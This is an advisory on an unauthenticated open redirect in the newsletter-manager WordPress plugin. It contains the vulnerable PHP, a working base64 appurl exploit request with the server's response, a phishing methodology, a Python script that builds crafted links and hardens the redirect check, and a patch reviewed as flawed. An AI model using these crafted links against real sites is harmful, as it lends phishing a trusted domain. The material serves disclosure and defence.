
Newsletter Manager - Unauthenticated Open Redirect

Summary

Description               Details
Name                      Newsletter Manager - Unauthenticated Open Redirect
Summary                   The appurl parameter of the email subscription confirmation URL is base64-decoded and used as the redirect target without any validation, so a visitor who follows the link can be sent to any external site
Affected application      newsletter-manager
Affected revision         all
Vendor update available   No
CVE
Ids                       CWE-601
CVSSv3.0 Base Score       4.7 (from the vector below; UI:R because the victim must click the link)
CVSS vector               AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Public Exploit available  Yes
Exploit verified          Yes
Authentication Required   No

Vulnerable Code

<?php
// confirmation.php: the redirect target comes straight from a base64-encoded
// request parameter and is never checked against the site's own origin.
$xyz_em_url = base64_decode($_GET['appurl']);
if($xyz_em_url=='')
        $xyz_em_url=get_option('xyz_em_emailConfirmation');

// ... (intervening code elided)

        // Append the status flag with '&' if the URL already has a query string, else '?'
        if(strpos($xyz_em_url,'?') > 0)
        {
                $xyz_em_url = $xyz_em_url."&result=success";

        }else{
                $xyz_em_url = $xyz_em_url."?result=success";
        }

        if($xyz_em_statusWelcomeFlag == 1)
                $xyz_em_url = $xyz_em_url."&confirm=true"; // need to confirm.
        else
                $xyz_em_url = $xyz_em_url."&confirm=false"; // already confirmed.

        // Attacker-controlled value lands in the Location header unchanged
        header("Location:".$xyz_em_url);

Exploit

Base64-encode the external target to produce the appurl value:

>>> import base64
>>> base64.b64encode(b"https://www.bountysite.com")
b'aHR0cHM6Ly93d3cuYm91bnR5c2l0ZS5jb20='

Send the confirmation request with that value as appurl:

http -v  "http://fv-wordpress-flowplayer-wp.vulnsite.xxyy/?wp_nlm=confirmation&eId=1&both=af7d6dc1065c5d29f5a1acd0f68e3917&lId=1&both=&appurl=aHR0cHM6Ly93d3cuYm91bnR5c2l0ZS5jb20="
GET /?wp_nlm=confirmation&eId=1&both=af7d6dc1065c5d29f5a1acd0f68e3917&lId=1&both=&appurl=aHR0cHM6Ly93d3cuYm91bnR5c2l0ZS5jb20= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: fv-wordpress-flowplayer-wp.vulnsite.xxyy
User-Agent: HTTPie/1.0.2



HTTP/1.1 302 Moved Temporarily
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Wed, 22 May 2019 06:53:00 GMT
Keep-Alive: timeout=5, max=100
Location: https://www.bountysite.com?result=failure
Server: Apache
Transfer-Encoding: chunked

Note the Location header in the response: the decoded appurl value is used verbatim as the redirect target, and the redirect to the external host happens even on the failure path (result=failure), so no valid eId or confirmation hash is needed:

Location: https://www.bountysite.com?result=failure

Exploit Methodology

The attacker has to do the following to exploit this vulnerability:

  • Send the victim a crafted link to the plugin's confirmation endpoint by email (or any other channel), with the base64-encoded external target in appurl; the link points at the legitimate WordPress host, which is what makes it convincing
  • The victim opens the link and is redirected by the trusted site to the attacker's external page (for example a phishing page that mimics the newsletter site)
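The following Python script is an added example, not code from the advisory or the plugin. It reproduces both halves of the issue above: the attacker's step of building the crafted link, and a Python mirror of the redirect logic from confirmation.php, placed beside a hardened version that only follows appurl when it stays on the configured origin. It goes slightly beyond the page by also showing why a string-prefix comparison (the shape of check the patch appears to aim for) is not an origin check. The host name is the advisory's lab host; the configured confirmation URL, the eId/lId values and the helper names are constructed assumptions for the example.

```python
import base64
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed values for the example: the lab host from the advisory, and a
# stand-in for the plugin option get_option('xyz_em_emailConfirmation'), assumed
# here to hold the bare site URL without a trailing slash.
SITE_URL = "http://fv-wordpress-flowplayer-wp.vulnsite.xxyy"
CONFIGURED_URL = SITE_URL


def build_crafted_link(site, attacker_url, eid="1", lid="1"):
    """Attacker side: base64-encode the external target and hang it on appurl,
    so the link the victim receives still points at the trusted WordPress host."""
    appurl = base64.b64encode(attacker_url.encode("utf-8")).decode("ascii")
    query = urlencode({"wp_nlm": "confirmation", "eId": eid, "lId": lid, "appurl": appurl})
    return f"{site}/?{query}"


def params_from_link(link):
    """Turn a crafted link back into the request parameters confirmation.php sees."""
    return {k: v[0] for k, v in parse_qs(urlsplit(link).query).items()}


def _decode_appurl(params):
    """Decode appurl the way the plugin does; undecodable input counts as empty."""
    try:
        return base64.b64decode(params.get("appurl", ""), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return ""


def _append_result(url, status):
    """The plugin's own query-string rule: '&' if a '?' is already present, else '?'."""
    return f"{url}{'&' if '?' in url else '?'}result={status}"


def vulnerable_target(params, status="failure"):
    """Mirror of confirmation.php: any non-empty decoded appurl becomes the Location."""
    url = _decode_appurl(params) or CONFIGURED_URL
    return _append_result(url, status)


def prefix_check(candidate, configured=CONFIGURED_URL):
    """A 'configured URL at position 0' test. Kept only to show that a string
    prefix is not an origin check: lookalike hosts and userinfo tricks pass it."""
    return candidate.startswith(configured)


def same_origin(candidate, configured=CONFIGURED_URL):
    """Hardened check: scheme and authority must match the configured page exactly.
    Comparing the whole netloc (which includes any userinfo) defeats 'host@evil'
    tricks, and the scheme test rejects protocol-relative '//evil' targets."""
    c, ref = urlsplit(candidate), urlsplit(configured)
    return (
        c.scheme in ("http", "https")
        and c.scheme == ref.scheme
        and c.hostname is not None
        and c.netloc.lower() == ref.netloc.lower()
    )


def safe_target(params, status="failure"):
    """Hardened replacement: follow appurl only when it stays on the configured origin,
    otherwise fall back to the configured confirmation page."""
    candidate = _decode_appurl(params)
    url = candidate if candidate and same_origin(candidate) else CONFIGURED_URL
    return _append_result(url, status)


if __name__ == "__main__":
    link = build_crafted_link(SITE_URL, "https://www.bountysite.com")
    params = params_from_link(link)
    print("victim clicks :", link)
    print("vulnerable    ->", vulnerable_target(params))
    print("hardened      ->", safe_target(params))
    for trick in ("http://fv-wordpress-flowplayer-wp.vulnsite.xxyy.evil.net/",
                  "http://fv-wordpress-flowplayer-wp.vulnsite.xxyy@evil.net/",
                  "//evil.net/"):
        print(f"{trick:60} prefix={prefix_check(trick)!s:5} same_origin={same_origin(trick)}")
```

Run it as-is to see the crafted link, the external Location the vulnerable logic produces for it, and the configured page the hardened logic falls back to; the last three lines show that a prefix comparison accepts the lookalike host and the userinfo form while the origin comparison rejects all three.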

Security Patch

BountySite security patch.

diff --git a/wp-content/plugins/newsletter-manager/confirmation.php b/wp-content/plugins/newsletter-manager/confirmation.php
index 4c21ba4..54dbc4e 100644
--- a/wp-content/plugins/newsletter-manager/confirmation.php
+++ b/wp-content/plugins/newsletter-manager/confirmation.php
@@ -34,6 +34,11 @@ $xyz_em_url = base64_decode($_GET['appurl']);
 if($xyz_em_url=='')
        $xyz_em_url=get_option('xyz_em_emailConfirmation');

+$valid_appurl_pos = strpos( $xyz_em_url , get_option('xyz_em_emailConfirmation') );
+if ( ( ! $valid_appurl_pos ) or ( $valid_appurl_pos != 0 )  ) {
+        $xyz_em_url=get_option('xyz_em_emailConfirmation');
+}
+
 if($combineValue == $xyz_em_both){

 $xyz_em_statusWelcomeFlag = 0;
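Review bot: the guard `if ( ( ! $valid_appurl_pos ) or ( $valid_appurl_pos != 0 )  )` is always true, so every request falls back to get_option('xyz_em_emailConfirmation') and appurl is effectively dead code: when strpos() returns 0 (the configured URL at the start, which is the case this check is meant to accept) `! $valid_appurl_pos` is true because 0 is falsy in PHP, and when it returns false or a positive offset one of the two clauses is true. If ignoring appurl is the intent, drop the strpos() and assign the option directly and say so in a comment; if the intent is to accept only URLs that begin with the configured page, the test needs to be `$valid_appurl_pos !== 0`. Even then a string prefix is not an origin check: with the option holding the bare site URL, both `https://site.example.evil.net/` and `https://site.example@evil.net/` begin with it and would pass. Comparing the scheme and host from parse_url() (or wp_parse_url()) of the decoded value against the configured page, or sending the redirect through wp_safe_redirect() so WordPress' allowed-hosts filtering applies, would be the stronger fix. Also note that strpos() with an empty needle (option unset) returns false on PHP versions before 8, so the fallback branch should not assume the option is populated.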